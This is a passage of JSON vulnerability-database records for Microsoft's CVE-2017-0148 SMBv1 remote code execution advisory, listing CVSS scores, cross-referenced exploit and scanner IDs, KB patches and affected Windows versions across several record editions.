"KB4013389"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-03-18T19:17:49", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-03-18T19:17:49", "rev": 2}}, "objectVersion": "1.5", "kbList": ["KB4013198", "KB3205401", "KB3177186", "KB3212646", "KB4012214", "KB4012598", "KB3205409", "KBMS16-110, 3187754", "KB3210720", "KB3213986", "KB3210721", "KB4013429", "KB4012215", "KB4012216", "KB4012606", "KB4012217", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-03-18T19:17:49", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-28T20:07:07", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-07-28T20:07:07", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-07-28T20:07:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB4012216", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KBMS16-110, 3187754", "KB4013198", "KB4012598", "KB3210720", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-28T20:07:07", "differentElements": ["msAffectedSoftware"], "edition": 4}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-03T18:46:41", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-03T18:46:41", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-03T18:46:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3210721", "KB4012212", "KB3177186", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB4012215", "KB3205409", "KB4012606", "KB3210720", "KB4012598", "KB4012216", "KB4013429", "KB4012214", "KB3213986", "KB4013198", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", 